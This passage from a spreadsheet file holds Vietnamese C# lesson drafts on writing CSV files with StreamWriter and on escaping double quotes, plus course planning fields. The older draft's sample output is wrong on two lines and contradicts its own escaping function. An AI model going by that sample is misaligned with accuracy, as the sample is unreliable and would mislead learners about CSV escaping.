Trong ví dụ trên, dòng thứ hai của dữ liệu (product2Line) minh họa một trường có dấu phẩy bên trong ("Chuột không dây, Bluetooth"). Để tuân thủ định dạng CSV chuẩn, trường này cần được bao quanh bởi dấu nháy kép. Chúng ta giả định rằng bước xử lý này đã được thực hiện khi tạo chuỗi product2Line. WriteLine() đơn giản chỉ ghi chuỗi đã được định dạng này vào file.
Các Chế độ Ghi File: Tạo mới, Ghi đè và Ghi tiếp
Khi làm việc với file, việc kiểm soát cách dữ liệu mới tương tác với nội dung hiện có là rất quan trọng. StreamWriter cung cấp các tùy chọn linh hoạt để xử lý các kịch bản này thông qua các chế độ ghi file khác nhau.
1. Tạo mới hoặc Ghi đè (Overwrite)
Đây là chế độ mặc định khi bạn tạo một StreamWriter chỉ với đường dẫn file (như trong các ví dụ trên) hoặc sử dụng phương thức File.CreateText().
Nếu file chưa tồn tại, nó sẽ được tạo mới.
Nếu file đã tồn tại, toàn bộ nội dung hiện có của nó sẽ bị xóa và thay thế bằng dữ liệu mới bạn ghi vào.
Ví dụ:
string filePath = "log.txt";
// Lần ghi đầu tiên: tạo file và ghi nội dung
using (StreamWriter writer = new StreamWriter(filePath)) // Mặc định là ghi đè
{
    writer.WriteLine("Dòng nhật ký đầu tiên.");
}
Console.WriteLine("Đã ghi lần 1 (tạo mới/ghi đè).");
// Lần ghi thứ hai: file đã tồn tại, nội dung cũ sẽ bị xóa và thay thế
using (StreamWriter writer = new StreamWriter(filePath))
{
    writer.WriteLine("Dòng nhật ký mới, ghi đè nội dung cũ.");
}
Console.WriteLine("Đã ghi lần 2 (ghi đè).");
Sau khi chạy đoạn code này, file log.txt sẽ chỉ chứa "Dòng nhật ký mới, ghi đè nội dung cũ."
2. Ghi tiếp (Append)
Chế độ ghi tiếp cho phép bạn thêm dữ liệu mới vào cuối một file đã tồn tại mà không làm mất đi nội dung cũ. Đây là chế độ rất hữu ích khi bạn muốn cập nhật một file nhật ký hoặc thêm các bản ghi mới vào một file CSV hiện có.
Để kích hoạt chế độ ghi tiếp, bạn cần sử dụng constructor của StreamWriter có tham số bool append và đặt nó thành true.
Ví dụ:
string filePath = "audit.csv";
// Đảm bảo file tồn tại với nội dung ban đầu (hoặc tạo mới)
using (StreamWriter writer = new StreamWriter(filePath))
{
    writer.WriteLine("Thời gian,Hành động");
    writer.WriteLine("2023-01-01 10:00:00,Đăng nhập");
}
Console.WriteLine("Đã ghi nội dung ban đầu.");
// Bây giờ, ghi thêm dữ liệu vào cuối file
using (StreamWriter writer = new StreamWriter(filePath, true)) // Tham số 'true' cho chế độ append
{
    writer.WriteLine("2023-01-01 10:05:30,Thêm sản phẩm");
    writer.WriteLine("2023-01-01 10:15:10,Đăng xuất");
}
Console.WriteLine("Đã ghi tiếp dữ liệu.");
Sau khi chạy đoạn code này, file audit.csv sẽ có nội dung như sau:
Thời gian,Hành động
2023-01-01 10:00:00,Đăng nhập
2023-01-01 10:05:30,Thêm sản phẩm
2023-01-01 10:15:10,Đăng xuất
Việc hiểu rõ và lựa chọn đúng chế độ ghi file là rất quan trọng để tránh mất dữ liệu không mong muốn và quản lý file hiệu quả trong các ứng dụng C#.</t>
        </is>
      </c>
      <c r="W49" s="22" t="inlineStr">
        <is>
          <t># Các bước cơ bản để ghi File CSV trong C#
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Mô tả các bước ghi một danh sách đối tượng ra tệp CSV.
- Dùng `StreamWriter` trong khối `using` để tạo tệp và ghi từng dòng bằng `WriteLine()`.
- Nối các giá trị của một đối tượng thành một dòng bằng `string.Join(",", ...)`.
- Phân biệt chế độ ghi đè và chế độ ghi tiếp (append).
- Quan sát từng đối tượng `Product` đi qua "dây chuyền ghi" thành một dòng trong tệp bằng hoạt động mô phỏng.
## Ghi CSV là chiều ngược của đọc CSV
Ở bài đọc, ta đi từ tệp, qua dòng văn bản, ra đối tượng. Khi ghi, ta đi ngược lại:
**đối tượng → mảng giá trị → dòng văn bản → tệp**
Công cụ chính là lớp `StreamWriter` trong `System.IO`. Nó ghi văn bản ra tệp và lo phần mã hóa ký tự (mặc định là UTF-8). Hãy luôn đặt `StreamWriter` trong khối `using` để tệp được đóng đúng lúc, dữ liệu được đẩy xuống đĩa và tài nguyên được giải phóng.
## Ghi từng dòng bằng `WriteLine()`
`WriteLine(string)` ghi chuỗi vào tệp rồi tự thêm ký tự xuống dòng. Mỗi lần gọi tạo ra một dòng mới, đúng với định dạng CSV: **mỗi dòng là một bản ghi**, các trường cách nhau bằng dấu phẩy.
Một tệp CSV thường có **dòng tiêu đề** (tên cột) ở đầu, rồi đến các dòng dữ liệu.
## Từ đối tượng đến dòng CSV
Giả sử có lớp `Product` gồm `Ma`, `Ten`, `Gia`. Với mỗi sản phẩm, ta làm ba việc:
1. Lấy các giá trị `Ma`, `Ten`, `Gia` (đổi `Gia` thành chuỗi) bỏ vào một mảng.
2. Nối mảng bằng dấu phẩy với `string.Join(",", mảng)`.
3. Ghi chuỗi vừa nối bằng `WriteLine()`.
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Product
{
    public string Ma { get; set; }
    public string Ten { get; set; }
    public int Gia { get; set; }
    public Product(string ma, string ten, int gia)
    {
        Ma = ma;
        Ten = ten;
        Gia = gia;
    }
}
public class Program
{
    public static void Main()
    {
        var list = new List&lt;Product&gt;
        {
            new Product("SP01", "Bút bi", 5000),
            new Product("SP02", "Vở", 12000),
            new Product("SP03", "Thước", 8000)
        };
        using (var w = new StreamWriter("sp.csv"))
        {
            w.WriteLine("Ma,Ten,Gia");   // dòng tiêu đề
            foreach (var p in list)
            {
                var f = new[] { p.Ma, p.Ten, p.Gia.ToString() };
                w.WriteLine(string.Join(",", f));
            }
        }
        Console.WriteLine(File.ReadAllText("sp.csv"));
        // Ma,Ten,Gia
        // SP01,Bút bi,5000
        // SP02,Vở,12000
        // SP03,Thước,8000
    }
}
```
Hai lưu ý nhỏ:
- Với số thập phân, hãy đổi chuỗi bằng `CultureInfo.InvariantCulture` (namespace `System.Globalization`), ví dụ `price.ToString(CultureInfo.InvariantCulture)`. Nếu không, trên máy dùng dấu phẩy thập phân, `12.5` có thể thành `12,5` và làm lệch cột.
- Cách nối bằng `string.Join` ở trên chỉ đúng khi giá trị **không chứa** dấu phẩy, nháy kép hay xuống dòng. Trường hợp đặc biệt được xử lý ở bài sau, "Quy tắc xử lý dấu nháy kép khi ghi CSV".
## Ghi đè và ghi tiếp
Cách tạo `StreamWriter` ảnh hưởng đến nội dung đã có trong tệp:
| Cách tạo | Chế độ | Khi tệp đã tồn tại |
|---|---|---|
| `new StreamWriter(path)` | Tạo mới hoặc ghi đè | Nội dung cũ bị xóa hoàn toàn |
| `new StreamWriter(path, true)` | Ghi tiếp (append) | Dữ liệu mới được thêm vào cuối tệp |
Tham số thứ hai là `append`. Chế độ ghi tiếp hữu ích khi thêm bản ghi vào tệp nhật ký hoặc tệp CSV có sẵn. Lưu ý khi ghi tiếp vào tệp CSV, bạn không ghi lại dòng tiêu đề.
```csharp
using System;
using System.IO;
public class Program
{
    public static void Main()
    {
        // Lần 1: tạo mới (hoặc ghi đè)
        using (var w = new StreamWriter("audit.csv"))
        {
            w.WriteLine("Thoi gian,Hanh dong");
            w.WriteLine("10:00,Dang nhap");
        }
        // Lần 2: ghi tiếp vào cuối tệp
        using (var w = new StreamWriter("audit.csv", true))
        {
            w.WriteLine("10:05,Them san pham");
        }
        Console.WriteLine(File.ReadAllText("audit.csv"));
        // Thoi gian,Hanh dong
        // 10:00,Dang nhap
        // 10:05,Them san pham
    }
}
```
Chọn nhầm chế độ có thể làm mất dữ liệu cũ, nên hãy xác định rõ mình cần ghi đè hay ghi tiếp trước khi tạo `StreamWriter`.
## Hoạt động: Ghi 3 sản phẩm ra sp.csv
Mô phỏng dưới đây có một tab, ghi ba sản phẩm vào tệp `sp.csv`. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Ghi 3 sản phẩm**. Ban đầu `list` có 3 `Product` (`SP01` Bút bi 5000, `SP02` Vở 12000, `SP03` Thước 8000) và tệp `sp.csv` chưa tồn tại. Sau khi mở `StreamWriter` trong `using`, tệp được tạo và đang rỗng. Bước `WriteLine("Ma,Ten,Gia")` ghi dòng tiêu đề đầu tiên; dòng mới hiện màu xanh.
- Tiếp tục bấm. Với `SP01`, hình "Dây chuyền ghi" sáng lần lượt các trạm: `Product`, `Mảng giá trị` (`["SP01", "Bút bi", "5000"]`), `string.Join`, `Dòng`, `Tệp`. Kết quả là dòng `SP01,Bút bi,5000` được thêm vào tệp.
- Vòng `foreach` lặp lại ba việc cho `SP02` (dòng `SP02,Vở,12000`) rồi `SP03` (dòng `SP03,Thước,8000`).
- Bước cuối, khi rời khối `using`, tệp được đóng và có 4 dòng: một dòng tiêu đề và ba dòng dữ liệu.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/ghi-du-lieu-ra-file-csv/cac-buoc-co-ban-de-ghi-file-csv-trong-c-sharp/" title="Các bước ghi File CSV" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: ghi CSV là ghi một dòng tiêu đề, rồi với mỗi đối tượng thì lấy giá trị, nối bằng dấu phẩy và ghi thành một dòng. Mỗi đối tượng đi qua cùng một dây chuyền.
## Tóm tắt
- Ghi CSV đi theo chiều: đối tượng, mảng giá trị, dòng văn bản, tệp.
- Dùng `StreamWriter` trong `using` để tệp luôn được đóng đúng cách.
- `WriteLine()` ghi một dòng và tự xuống dòng; mỗi dòng CSV là một bản ghi.
- `string.Join(",", mảng)` nối các giá trị thành một dòng; số thập phân nên đổi bằng `CultureInfo.InvariantCulture`.
- `new StreamWriter(path)` ghi đè, `new StreamWriter(path, true)` ghi tiếp.
- Cách nối đơn giản chỉ an toàn khi giá trị không chứa dấu phẩy, nháy kép hay xuống dòng.</t>
        </is>
      </c>
    </row>
    <row r="50" ht="409.6" customHeight="1" s="18">
      <c r="A50" s="10" t="n">
        <v>50</v>
      </c>
      <c r="B50" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C50" s="10" t="inlineStr">
        <is>
          <t>Ghi dữ liệu ra File CSV</t>
        </is>
      </c>
      <c r="D50" s="10" t="inlineStr">
        <is>
          <t>Quy tắc xử lý dấu nháy kép khi ghi CSV</t>
        </is>
      </c>
      <c r="E50" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F50" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G50" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H50" s="10" t="inlineStr">
        <is>
          <t>Áp dụng đúng quy tắc 'bọc nháy và nhân đôi nháy' khi ghi một trường.</t>
        </is>
      </c>
      <c r="I50" s="10" t="inlineStr">
        <is>
          <t>1 cột, 4 tab theo giá trị trường</t>
        </is>
      </c>
      <c r="J50" s="10" t="inlineStr">
        <is>
          <t>Thẻ 'giá trị trường' đi qua 2 trạm: 'Có dấu phẩy / nháy / xuống dòng?' và 'Nhân đôi dấu nháy'. Trạm sáng/tắt; kết quả cuối hiện trong ô CSV có tô màu phần được thêm.</t>
        </is>
      </c>
      <c r="K50" s="10" t="inlineStr">
        <is>
          <t>H09, H17</t>
        </is>
      </c>
      <c r="L50" s="10" t="inlineStr">
        <is>
          <t>Bút bi | Hà Nội, Việt Nam | Sách "C#" | Có xuống dòng</t>
        </is>
      </c>
      <c r="M50" s="10" t="inlineStr">
        <is>
          <t>Bút bi → không có ký tự đặc biệt → giữ nguyên: Bút bi.
Hà Nội, Việt Nam → có dấu phẩy → bọc nháy: "Hà Nội, Việt Nam".
Sách "C#" → có nháy → nhân đôi nháy rồi bọc: "Sách ""C#""".
Dòng 1↵Dòng 2 → có xuống dòng → bọc nháy.
Bước cuối mỗi tab: hiện hàm EscapeCsv và kết quả.</t>
        </is>
      </c>
      <c r="N50" s="10" t="inlineStr">
        <is>
          <t>4 giá trị mẫu</t>
        </is>
      </c>
      <c r="O50" s="10" t="inlineStr">
        <is>
          <t>Ghi đúng quy tắc thì đọc lại bằng bộ phân tích chuẩn sẽ ra đúng giá trị ban đầu.</t>
        </is>
      </c>
      <c r="P50" s="10" t="inlineStr">
        <is>
          <t>EscapeCsv: nếu chứa , " \n hoặc \r thì trả "\"" + s.Replace("\"", "\"\"") + "\"".</t>
        </is>
      </c>
      <c r="Q50" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/ghi-du-lieu-ra-file-csv/quy-tac-xu-ly-dau-nhay-kep-khi-ghi-csv/index.html</t>
        </is>
      </c>
      <c r="R50" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/ghi-du-lieu-ra-file-csv/quy-tac-xu-ly-dau-nhay-kep-khi-ghi-csv/</t>
        </is>
      </c>
      <c r="S50" s="10" t="n"/>
      <c r="T50" s="12" t="n"/>
      <c r="U50" s="12" t="n"/>
      <c r="V50" s="21" t="inlineStr">
        <is>
          <t>Quy tắc xử lý dấu nháy kép khi ghi CSV
Khi làm việc với định dạng CSV (Comma Separated Values), việc ghi dữ liệu tưởng chừng đơn giản nhưng lại ẩn chứa nhiều quy tắc tinh tế, đặc biệt là khi dữ liệu của bạn có chứa các ký tự đặc biệt. Để đảm bảo file CSV tạo ra có thể được đọc hiểu chính xác bởi các ứng dụng khác, chúng ta cần tuân thủ nghiêm ngặt các quy tắc liên quan đến dấu nháy kép. Bài đọc này sẽ đi sâu vào cách xử lý các trường hợp này trong quá trình ghi file CSV.
Khi nào cần bọc trường bằng dấu nháy kép?
Theo tiêu chuẩn CSV (RFC 4180), một trường dữ liệu cần được bọc bởi dấu nháy kép (double quotes, ") nếu nó chứa một trong các ký tự đặc biệt sau:
Dấu phân cách (Delimiter): Thông thường là dấu phẩy (,). Nếu một trường dữ liệu có chứa dấu phẩy, nó phải được bọc trong dấu nháy kép. Nếu không, bộ phân tích CSV sẽ hiểu nhầm phần sau dấu phẩy là một trường mới.
Ví dụ: Dữ liệu là Hà Nội, Việt Nam. Nếu ghi trực tiếp, nó sẽ trở thành hai trường: Hà Nội và Việt Nam. Để nó là một trường duy nhất, ta phải ghi là "Hà Nội, Việt Nam".
Dấu nháy kép ("): Nếu một trường dữ liệu chứa ký tự dấu nháy kép, nó bắt buộc phải được bọc trong dấu nháy kép. Ngoài ra, bản thân ký tự dấu nháy kép bên trong trường đó cũng cần được xử lý đặc biệt (sẽ được giải thích chi tiết ở phần sau).
Ví dụ: Dữ liệu là Sản phẩm "Cao cấp". Để ghi đúng, nó phải trở thành "Sản phẩm ""Cao cấp""". (Lưu ý dấu nháy kép kép và cặp dấu nháy kép bọc ngoài).
Ký tự xuống dòng (Line Break/Newline): CSV cho phép một trường dữ liệu trải dài trên nhiều dòng. Nếu một trường chứa ký tự xuống dòng (ví dụ: \n hoặc \r\n), nó phải được bọc trong dấu nháy kép.
Ví dụ: Dữ liệu là Dòng 1\nDòng 2. Để ghi đúng, nó phải trở thành "Dòng 1\nDòng 2".
Dấu phân cách dòng (Record Delimiter): Mặc dù ít phổ biến hơn, nếu trường dữ liệu chứa ký tự phân cách dòng (thường là \n hoặc \r\n), nó cũng phải được bọc dấu nháy kép. Điều này tương tự như trường hợp xuống dòng.
Tóm lại: Một quy tắc an toàn là nếu bạn nghi ngờ dữ liệu có thể chứa bất kỳ ký tự đặc biệt nào (dấu phẩy, dấu nháy kép, xuống dòng), hãy bọc nó trong dấu nháy kép. Hoặc đơn giản hơn, luôn bọc tất cả các trường chuỗi bằng dấu nháy kép để nhất quán, miễn là bạn xử lý đúng trường hợp dấu nháy kép bên trong.
Xử lý dấu nháy kép bên trong trường dữ liệu
Đây là quy tắc quan trọng nhất và thường gây nhầm lẫn nhất khi tạo file CSV. Khi một trường dữ liệu bản thân nó đã chứa một ký tự dấu nháy kép ("), bạn không chỉ đơn thuần bọc toàn bộ trường đó trong dấu nháy kép nữa. Thay vào đó, mỗi dấu nháy kép xuất hiện bên trong trường dữ liệu đó phải được "thoát" (escaped) bằng cách thêm một dấu nháy kép thứ hai ngay sau nó.
Sau khi tất cả các dấu nháy kép bên trong đã được thoát, toàn bộ trường dữ liệu đó vẫn phải được bọc trong một cặp dấu nháy kép.
Quy tắc: " trở thành "" bên trong trường. Sau đó, toàn bộ trường được bọc bởi "".
Ví dụ minh họa:
Dữ liệu gốc: Đây là một chuỗi có "dấu nháy kép" bên trong.
Bước 1: Thoát dấu nháy kép bên trong: Các dấu nháy kép đơn (") trong chuỗi gốc sẽ được thay thế bằng dấu nháy kép kép ("").
Đây là một chuỗi có ""dấu nháy kép"" bên trong.
Bước 2: Bọc toàn bộ trường bằng dấu nháy kép: Sau khi đã thoát, toàn bộ chuỗi được bọc trong một cặp dấu nháy kép.
"Đây là một chuỗi có ""dấu nháy kép"" bên trong."
Nếu bạn không thực hiện bước 1 (thoát dấu nháy kép bên trong), bộ phân tích CSV sẽ hiểu nhầm dấu nháy kép đầu tiên là dấu kết thúc của trường và phần còn lại của chuỗi sẽ bị lỗi.
Ví dụ tổng hợp và triển khai trong C#
Để minh họa các quy tắc trên, chúng ta sẽ xem xét một số ví dụ và cách triển khai logic này trong C#. Giả sử bạn đã biết cách sử dụng StreamWriter để ghi dữ liệu ra file như đã học trong bài "Các bước cơ bản để ghi File CSV trong C#". Nhiệm vụ của chúng ta bây giờ là xây dựng một hàm giúp định dạng từng trường dữ liệu một cách chính xác.
Chúng ta sẽ tạo một hàm EscapeAndQuoteCsvField nhận vào một chuỗi và trả về chuỗi đã được định dạng đúng chuẩn CSV.
using System;
using System.IO;
using System.Text;
public static class CsvHelper
{
    public static string EscapeAndQuoteCsvField(string field)
    {
        if (field == null)
        {
            return ""; // Hoặc "null" tùy theo yêu cầu
        }
        // Kiểm tra xem trường có cần được bọc dấu nháy kép hay không.
        // Cần bọc nếu chứa dấu phẩy, dấu nháy kép, hoặc ký tự xuống dòng.
        bool needsQuotes = field.Contains(',') ||
                           field.Contains('"') ||
                           field.Contains('\n') ||
                           field.Contains('\r');
        // Nếu trường chứa dấu nháy kép, chúng ta phải thoát chúng bằng cách nhân đôi.
        // Ví dụ: "Hello" -&gt; ""Hello""
        string escapedField = field.Replace("\"", "\"\"");
        if (needsQuotes)
        {
            // Bọc toàn bộ trường đã thoát bằng dấu nháy kép.
            return $"\"{escapedField}\"";
        }
        else
        {
            // Không cần bọc dấu nháy kép nếu không có ký tự đặc biệt.
            return escapedField;
        }
    }
    public static void WriteCsvExample(string filePath)
    {
        string header = "ID,Tên Sản Phẩm,Mô Tả,Giá";
        string[] data = new string[]
        {
            "1", "Bút Chì", "Bút chì 2B", "5000",
            "2", "Sổ Tay", "Sổ tay A5, 100 trang", "25000",
            "3", "Bút bi \"Đặc Biệt\"", "Bút bi mực gel, màu đen", "10000",
            "4", "Sách \"Lập Trình C#\"", "Sách hướng dẫn lập trình C# từ cơ bản đến nâng cao", "150000",
            "5", "Ghi Chú Đa Dòng", "Đây là một ghi chú\nvới nhiều dòng khác nhau.", "Không áp dụng"
        };
        using (StreamWriter sw = new StreamWriter(filePath, false, Encoding.UTF8))
        {
            // Ghi tiêu đề
            string[] headerFields = header.Split(',');
            for (int i = 0; i &lt; headerFields.Length; i++)
            {
                sw.Write(EscapeAndQuoteCsvField(headerFields[i]));
                if (i &lt; headerFields.Length - 1)
                {
                    sw.Write(",");
                }
            }
            sw.WriteLine();
            // Ghi dữ liệu
            for (int i = 0; i &lt; data.Length; i += 4) // Mỗi dòng có 4 trường
            {
                sw.Write(EscapeAndQuoteCsvField(data[i]));
                sw.Write(",");
                sw.Write(EscapeAndQuoteCsvField(data[i+1]));
                sw.Write(",");
                sw.Write(EscapeAndQuoteCsvField(data[i+2]));
                sw.Write(",");
                sw.Write(EscapeAndQuoteCsvField(data[i+3]));
                sw.WriteLine();
            }
        }
        Console.WriteLine($"File CSV đã được tạo tại: {filePath}");
    }
}
Giải thích ví dụ:
Trong hàm EscapeAndQuoteCsvField:
Chúng ta kiểm tra xem trường field có chứa các ký tự đặc biệt (,', ", \n, \r) hay không để quyết định liệu có cần bọc dấu nháy kép bên ngoài hay không.
field.Replace("\"", "\"\"") là bước quan trọng để thoát tất cả các dấu nháy kép bên trong trường dữ liệu. Mỗi dấu " sẽ được thay bằng "".
Cuối cùng, nếu needsQuotes là true, chúng ta bọc chuỗi escapedField đã được xử lý bằng một cặp dấu nháy kép.
Khi chạy hàm WriteCsvExample, output CSV sẽ có dạng:
ID,Tên Sản Phẩm,Mô Tả,Giá
1,Bút Chì,Bút chì 2B,5000
2,Sổ Tay,"Sổ tay A5, 100 trang",25000
3,"Bút bi ""Đặc Biệt""",Bút bi mực gel, màu đen,10000
4,"Sách ""Lập Trình C#""","Sách hướng dẫn lập trình C# từ cơ bản đến nâng cao",150000
5,Ghi Chú Đa Dòng,"Đây là một ghi chú
với nhiều dòng khác nhau.",Không áp dụng
Quan sát các dòng dữ liệu trong ví dụ trên, bạn có thể thấy cách các quy tắc đã được áp dụng:
Dòng 2: "Sổ tay A5, 100 trang" - trường này chứa dấu phẩy, nên được bọc dấu nháy kép.
Dòng 3: "Bút bi ""Đặc Biệt""" - trường này chứa dấu nháy kép " (trong "Đặc Biệt"), nên dấu nháy kép đó được thoát thành "", và toàn bộ trường được bọc dấu nháy kép.
Dòng 4: "Sách ""Lập Trình C#""" và "Sách hướng dẫn lập trình C# từ cơ bản đến nâng cao" - cả hai trường đều áp dụng quy tắc tương tự.
Dòng 5: "Đây là một ghi chú\nvới nhiều dòng khác nhau." - trường này chứa ký tự xuống dòng, nên được bọc dấu nháy kép và giữ nguyên cấu trúc xuống dòng bên trong.
Việc hiểu và áp dụng đúng các quy tắc này là rất quan trọng để đảm bảo tính tương thích và khả năng đọc dữ liệu CSV của bạn.</t>
        </is>
      </c>
      <c r="W50" s="22" t="inlineStr">
        <is>
          <t># Quy tắc xử lý dấu nháy kép khi ghi CSV
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Nhận ra khi nào một trường CSV phải được bọc trong dấu nháy kép (theo RFC 4180).
- Giải thích quy tắc nhân đôi dấu nháy kép bên trong trường.
- Viết hàm `EscapeCsv` kiểm tra ký tự đặc biệt, nhân đôi nháy và bọc nháy.
- Dùng hàm đó để ghi một dòng CSV có nhiều loại trường khác nhau.
- Quan sát một giá trị đi qua hai trạm xử lý bằng hoạt động mô phỏng.
## Khi nào phải bọc trường trong nháy kép?
Theo tiêu chuẩn CSV (RFC 4180), một trường phải được bọc trong cặp dấu nháy kép (`"`) nếu nó chứa **ít nhất một** trong các ký tự sau:
| Ký tự trong giá trị | Ví dụ giá trị | Ghi ra tệp |
|---|---|---|
| Dấu phẩy `,` | `Hà Nội, Việt Nam` | `"Hà Nội, Việt Nam"` |
| Dấu nháy kép `"` | `Sách "C#"` | `"Sách ""C#"""` |
| Xuống dòng (`\n` hoặc `\r`) | `Dòng 1` xuống dòng `Dòng 2` | trường được bọc nháy, xuống dòng giữ nguyên bên trong |
Nếu không có ký tự đặc biệt nào, như `Bút bi`, trường được ghi nguyên văn, không cần bọc.
Nếu thiếu nháy bao quanh, bộ đọc CSV sẽ hiểu sai: dấu phẩy bị coi là dấu phân cách, còn dòng mới bị coi là bản ghi mới.
## Dấu nháy kép bên trong trường
Đây là quy tắc dễ nhầm nhất. Khi giá trị có chứa dấu `"`, ta không chỉ bọc trường. Mỗi dấu `"` bên trong còn phải được **nhân đôi** thành `""`. Hai bước theo thứ tự:
1. Thay mỗi `"` trong giá trị bằng `""`.
2. Bọc toàn bộ chuỗi vừa có bằng một cặp `"` ở đầu và cuối.
Ví dụ với giá trị `Sách "C#"`:
- Sau bước 1: `Sách ""C#""`
- Sau bước 2: `"Sách ""C#"""`
Nếu bỏ bước 1, bộ đọc sẽ coi dấu nháy đầu tiên bên trong là nháy đóng trường, và phần còn lại bị lỗi.
## Hàm `EscapeCsv`
Ta gom các quy tắc vào một hàm nhận giá trị và trả về chuỗi đã đúng chuẩn CSV:
```csharp
using System;
public class Program
{
    public static string EscapeCsv(string s)
    {
        if (s == null)
        {
            return "";
        }
        bool need = s.Contains(',')
                 || s.Contains('"')
                 || s.Contains('\n')
                 || s.Contains('\r');
        if (!need)
        {
            return s;   // không có ký tự đặc biệt: giữ nguyên
        }
        string t = s.Replace("\"", "\"\"");   // trạm 2: nhân đôi nháy
        return "\"" + t + "\"";               // trạm 3: bọc nháy kép
    }
    public static void Main()
    {
        Console.WriteLine(EscapeCsv("Bút bi"));            // Bút bi
        Console.WriteLine(EscapeCsv("Hà Nội, Việt Nam"));  // "Hà Nội, Việt Nam"
        Console.WriteLine(EscapeCsv("Sách \"C#\""));       // "Sách ""C#"""
        Console.WriteLine(EscapeCsv("Dòng 1\nDòng 2"));
        // "Dòng 1
        // Dòng 2"
    }
}
```
Hàm có thể hình dung là hai trạm: trạm 1 kiểm tra có dấu phẩy, nháy kép hoặc xuống dòng không; nếu có thì sang trạm 2 nhân đôi nháy rồi bọc nháy. Nếu không có, giá trị đi thẳng ra, giữ nguyên.
## Ghi một dòng CSV bằng `EscapeCsv`
Khi ghi bản ghi, hãy áp dụng `EscapeCsv` cho **từng trường** rồi mới nối bằng dấu phẩy. Đừng áp dụng cho cả dòng đã nối, vì khi đó các dấu phẩy phân cách cũng bị coi là dữ liệu.
```csharp
using System;
using System.IO;
using System.Text;
public class Program
{
    public static string EscapeCsv(string s)
    {
        if (s == null) return "";
        bool need = s.Contains(',') || s.Contains('"') || s.Contains('\n') || s.Contains('\r');
        if (!need) return s;
        return "\"" + s.Replace("\"", "\"\"") + "\"";
    }
    public static void WriteRow(StreamWriter w, params string[] fields)
    {
        var escaped = new string[fields.Length];
        for (int i = 0; i &lt; fields.Length; i++)
        {
            escaped[i] = EscapeCsv(fields[i]);
        }
        w.WriteLine(string.Join(",", escaped));
    }
    public static void Main()
    {
        using (var w = new StreamWriter("sp.csv", false, Encoding.UTF8))
        {
            WriteRow(w, "ID", "Tên", "Mô tả", "Giá");
            WriteRow(w, "1", "Bút chì", "Bút chì 2B", "5000");
            WriteRow(w, "2", "Sổ tay", "Sổ tay A5, 100 trang", "25000");
            WriteRow(w, "3", "Bút bi \"Đặc biệt\"", "Bút bi mực gel, màu đen", "10000");
            WriteRow(w, "4", "Ghi chú", "Dòng 1\nDòng 2", "0");
        }
        Console.WriteLine(File.ReadAllText("sp.csv"));
        // ID,Tên,Mô tả,Giá
        // 1,Bút chì,Bút chì 2B,5000
        // 2,Sổ tay,"Sổ tay A5, 100 trang",25000
        // 3,"Bút bi ""Đặc biệt""","Bút bi mực gel, màu đen",10000
        // 4,Ghi chú,"Dòng 1
        // Dòng 2",0
    }
}
```
Hãy quan sát từng dòng kết quả:
- Dòng 1 không có ký tự đặc biệt, nên ghi nguyên văn.
- Dòng 2 có dấu phẩy trong `Sổ tay A5, 100 trang`, nên trường được bọc nháy.
- Dòng 3: tên có nháy kép nên thành `"Bút bi ""Đặc biệt"""`; mô tả có dấu phẩy nên cũng được bọc nháy.
- Dòng 4: mô tả có xuống dòng, nên được bọc nháy và giữ nguyên xuống dòng bên trong.
## Hoạt động: Một giá trị đi qua hai trạm
Mô phỏng dưới đây chạy hàm `EscapeCsv` với bốn giá trị khác nhau, mỗi giá trị ở một tab. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Bút bi**. Ở "Trạm 1", giá trị không có dấu phẩy, nháy kép hay xuống dòng nên `need` là `false`. Hàm trả về `s` luôn, ô CSV giữ nguyên `Bút bi`.
- Mở tab **Hà Nội, Việt Nam**. Trạm 1 phát hiện dấu phẩy nên `need` là `true`. Trạm nhân đôi nháy không đổi gì vì giá trị không có nháy kép. Bước bọc nháy thêm hai dấu `"` (tô xanh) ở đầu và cuối, kết quả `"Hà Nội, Việt Nam"`.
- Mở tab **Sách "C#"**. Trạm 1 phát hiện dấu nháy kép. Trạm 2 nhân đôi mỗi dấu `"` thành `""` (dấu thêm vào tô xanh). Cuối cùng hai dấu bọc ngoài được thêm, kết quả `"Sách ""C#"""`.
- Mở tab **Có xuống dòng**. Giá trị `Dòng 1` xuống dòng `Dòng 2` (hình minh họa hiển thị ký tự xuống dòng là `↵`). Trạm 1 phát hiện xuống dòng, trạm nhân đôi không đổi gì, rồi giá trị được bọc nháy. Kết quả in ra hai dòng, vì xuống dòng vẫn nằm bên trong trường.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/ghi-du-lieu-ra-file-csv/quy-tac-xu-ly-dau-nhay-kep-khi-ghi-csv/" title="Quy tắc nháy kép khi ghi CSV" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: mỗi trường đi qua cùng hai trạm. Trạm 1 quyết định có cần bọc hay không. Nếu cần, nháy bên trong được nhân đôi rồi cả trường được bọc nháy. Ghi đúng quy tắc thì đọc lại bằng bộ phân tích chuẩn sẽ ra đúng giá trị ban đầu.
## Mẹo thực tế
Nếu muốn đơn giản, bạn có thể luôn bọc mọi trường chuỗi trong nháy kép, miễn là vẫn nhân đôi nháy bên trong. Tuy nhiên, cách bọc "chỉ khi cần" như `EscapeCsv` cho tệp gọn hơn và vẫn hợp chuẩn.
## Tóm tắt
- Bọc trường trong `"..."` khi nó chứa dấu phẩy, dấu nháy kép hoặc xuống dòng.
